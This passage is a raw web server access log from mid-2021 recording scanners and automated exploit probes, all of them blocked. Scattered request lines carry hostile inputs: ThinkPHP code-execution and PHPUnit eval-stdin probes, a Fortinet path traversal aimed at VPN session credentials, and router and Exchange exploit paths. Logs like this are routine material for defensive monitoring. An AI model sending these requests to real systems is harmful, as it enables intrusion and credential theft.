Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:12:24:02 +0000] 444 - GET https pop.moralanimal.net "/" [Client 124.126.78.166] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 9; zh-cn; RMX1901 Build/QKQ1.190918.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 HeyTapBrowser/40.7.22.1" "-" [30/Jul/2021:12:41:03 +0000] 444 - GET https 64.22.21.87 "/" [Client 183.136.225.12] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [30/Jul/2021:15:26:33 +0000] 444 - GET https 64.22.21.87 "/" [Client 172.105.161.246] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [30/Jul/2021:16:35:54 +0000] 444 - GET https localhost "/" [Client 109.248.6.168] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [30/Jul/2021:18:35:00 +0000] 400 - GET http 64.22.21.87 "/owa/auth/x.js" [Client 192.241.196.35] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Jul/2021:18:44:45 +0000] 444 - GET https 64.22.21.87 "/owa/auth/logon.aspx" [Client 192.241.217.137] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Jul/2021:18:52:33 +0000] 444 - GET https 64.22.21.87 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.217.38] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Jul/2021:19:18:33 +0000] 444 - GET https 64.22.21.87 "/web/index.html" [Client 92.118.160.61] [Length 0] [Gzip -] "Go http package" "-" [30/Jul/2021:19:33:15 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [30/Jul/2021:19:59:47 +0000] 444 - GET https 64.22.21.87 "/" [Client 192.241.220.166] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Jul/2021:20:01:11 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:20:01:12 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:20:01:29 +0000] 400 - - http localhost "-" [Client 185.202.2.147] [Length 154] [Gzip -] "-" "-" [30/Jul/2021:20:01:32 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:20:01:33 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:21:07:19 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Jul/2021:21:07:19 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Jul/2021:21:07:19 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Jul/2021:21:07:19 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Jul/2021:21:07:19 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Jul/2021:21:07:19 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Jul/2021:21:17:33 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 162.62.117.51] [Length 0] [Gzip -] "-" "-" [30/Jul/2021:21:38:19 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 144.86.173.140] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [30/Jul/2021:22:19:54 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 144.86.173.95] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [30/Jul/2021:22:40:09 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [30/Jul/2021:22:51:44 +0000] 444 - GET https 64.22.21.87 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.214.196] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Jul/2021:22:54:44 +0000] 444 - GET https 64.22.21.87 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [30/Jul/2021:23:00:03 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:23:00:04 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:23:23:36 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:23:23:37 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:23:25:54 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [31/Jul/2021:01:24:52 +0000] 444 - GET https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:01:24:53 +0000] 444 - POST https 64.22.21.87 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:01:24:54 +0000] 444 - GET https 64.22.21.87 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:01:24:55 +0000] 444 - POST https 64.22.21.87 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.21.87:443" [31/Jul/2021:01:24:55 +0000] 444 - GET https 64.22.21.87 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:01:24:56 +0000] 444 - GET https 64.22.21.87 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:01:24:57 +0000] 444 - GET https 64.22.21.87 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:01:24:58 +0000] 444 - GET https 64.22.21.87 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:01:24:58 +0000] 444 - POST https 64.22.21.87 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:01:25:00 +0000] 444 - GET https 64.22.21.87 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:01:25:02 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:03:24:57 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Jul/2021:04:01:14 +0000] 444 - GET https 64.22.21.87 "/" [Client 162.142.125.37] [Length 0] [Gzip -] "-" "-" [31/Jul/2021:04:01:16 +0000] 400 - GET http 64.22.21.87 "/" [Client 162.142.125.37] [Length 252] [Gzip -] "-" "-" [31/Jul/2021:04:01:16 +0000] 400 - GET http 64.22.21.87 "/" [Client 162.142.125.37] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [31/Jul/2021:05:20:51 +0000] 444 - GET https 64.22.21.87 "/" [Client 184.105.247.196] [Length 0] [Gzip -] "-" "-" [31/Jul/2021:05:33:30 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/8.1.0.0 Safari/540.0" "-" [31/Jul/2021:05:33:31 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [31/Jul/2021:05:34:29 +0000] 444 - GET https 64.22.21.87 "/" [Client 167.248.133.40] [Length 0] [Gzip -] "-" "-" [31/Jul/2021:05:34:30 +0000] 400 - GET http 64.22.21.87 "/" [Client 167.248.133.40] [Length 252] [Gzip -] "-" "-" [31/Jul/2021:05:34:30 +0000] 400 - GET http 64.22.21.87 "/" [Client 167.248.133.40] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [31/Jul/2021:06:22:20 +0000] 444 - GET https 87.21.22.64.aeneasdsl.com "/owa/auth/x.js" [Client 194.9.70.148] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" [31/Jul/2021:06:22:20 +0000] 400 - GET http 87.21.22.64.aeneasdsl.com "/owa/auth/x.js" [Client 194.9.70.148] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" "-" [31/Jul/2021:06:26:26 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Jul/2021:06:54:30 +0000] 444 - GET https 64.22.21.87 "/" [Client 180.149.125.175] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" [31/Jul/2021:08:05:05 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Jul/2021:08:42:48 +0000] 444 - GET https 64.22.21.87 "/actuator/health" [Client 192.241.216.90] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Jul/2021:09:52:06 +0000] 444 - GET https 64.22.21.87 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.217.154] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Jul/2021:10:39:50 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 162.62.117.51] [Length 0] [Gzip -] "-" "-" [31/Jul/2021:11:00:28 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.227.134.73] [Length 0] [Gzip -] "curl/7.3.2" "-" [31/Jul/2021:12:44:33 +0000] 444 - POST https 64.22.21.87 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:12:44:33 +0000] 444 - GET https 64.22.21.87 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:12:44:36 +0000] 444 - POST https 64.22.21.87 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:12:44:36 +0000] 444 - GET https 64.22.21.87 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:12:44:38 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:12:44:38 +0000] 444 - GET https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:12:44:42 +0000] 444 - GET https 64.22.21.87 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:12:44:42 +0000] 444 - GET https 64.22.21.87 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:12:44:43 +0000] 444 - GET https 64.22.21.87 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:12:44:45 +0000] 444 - POST https 64.22.21.87 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.21.87:443" [31/Jul/2021:12:44:45 +0000] 444 - GET https 64.22.21.87 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Jul/2021:16:54:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Jul/2021:17:00:40 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [31/Jul/2021:17:00:40 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [31/Jul/2021:17:00:40 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [31/Jul/2021:17:00:40 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [31/Jul/2021:17:00:40 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [31/Jul/2021:17:00:40 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [31/Jul/2021:20:45:57 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 87.251.70.85] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "-" [31/Jul/2021:22:52:13 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.217.150] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Jul/2021:23:26:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Jul/2021:23:43:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 2.57.122.21] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36" "-" [01/Aug/2021:00:02:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [01/Aug/2021:00:10:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.54] [Length 0] [Gzip -] "-" "-" [01/Aug/2021:00:10:35 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.54] [Length 252] [Gzip -] "-" "-" [01/Aug/2021:00:10:35 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.54] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [01/Aug/2021:01:11:54 +0000] 444 - HEAD https 64.22.31.253 "/epa/scripts/win/nsepa_setup.exe" [Client 34.222.206.181] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [01/Aug/2021:03:12:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.56] [Length 0] [Gzip -] "-" "-" [01/Aug/2021:03:12:08 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.56] [Length 252] [Gzip -] "-" "-" [01/Aug/2021:03:12:09 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.56] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [01/Aug/2021:03:41:31 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 143.244.41.194] [Length 0] [Gzip -] "curl/7.64.0" "-" [01/Aug/2021:03:41:31 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 143.244.41.194] [Length 0] [Gzip -] "curl/7.64.0" "-" [01/Aug/2021:03:41:32 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 143.244.41.194] [Length 0] [Gzip -] "curl/7.64.0" "-" [01/Aug/2021:03:41:33 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 143.244.41.194] [Length 0] [Gzip -] "curl/7.64.0" "-" [01/Aug/2021:03:41:34 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 143.244.41.194] [Length 0] [Gzip -] "curl/7.64.0" "-" [01/Aug/2021:04:05:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.207.16] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Aug/2021:04:06:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.2] [Length 0] [Gzip -] "-" "-" [01/Aug/2021:04:43:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Aug/2021:06:13:14 +0000] 444 - GET https 64.22.31.253 "/level/15/exec/-/sh/run/CR" [Client 94.102.49.198] [Length 0] [Gzip -] "libwww-perl/6.54" "-" [01/Aug/2021:06:21:33 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.227.134.73] [Length 0] [Gzip -] "curl/7.3.2" "-" [01/Aug/2021:06:42:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.142.236.43] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [01/Aug/2021:06:42:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.142.236.43] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [01/Aug/2021:06:42:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.142.236.43] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [01/Aug/2021:06:54:32 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 18.144.169.7] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [01/Aug/2021:09:27:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.55] [Length 0] [Gzip -] "-" "-" [01/Aug/2021:09:27:13 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.55] [Length 252] [Gzip -] "-" "-" [01/Aug/2021:09:27:13 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.55] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [01/Aug/2021:09:54:55 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.215.32] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Aug/2021:10:32:17 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Aug/2021:10:32:19 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Aug/2021:10:32:19 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Aug/2021:10:32:20 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [01/Aug/2021:10:32:21 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Aug/2021:10:32:22 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Aug/2021:10:32:22 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Aug/2021:10:32:23 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Aug/2021:10:32:24 +0000] 444 - GET https 64.22.31.253 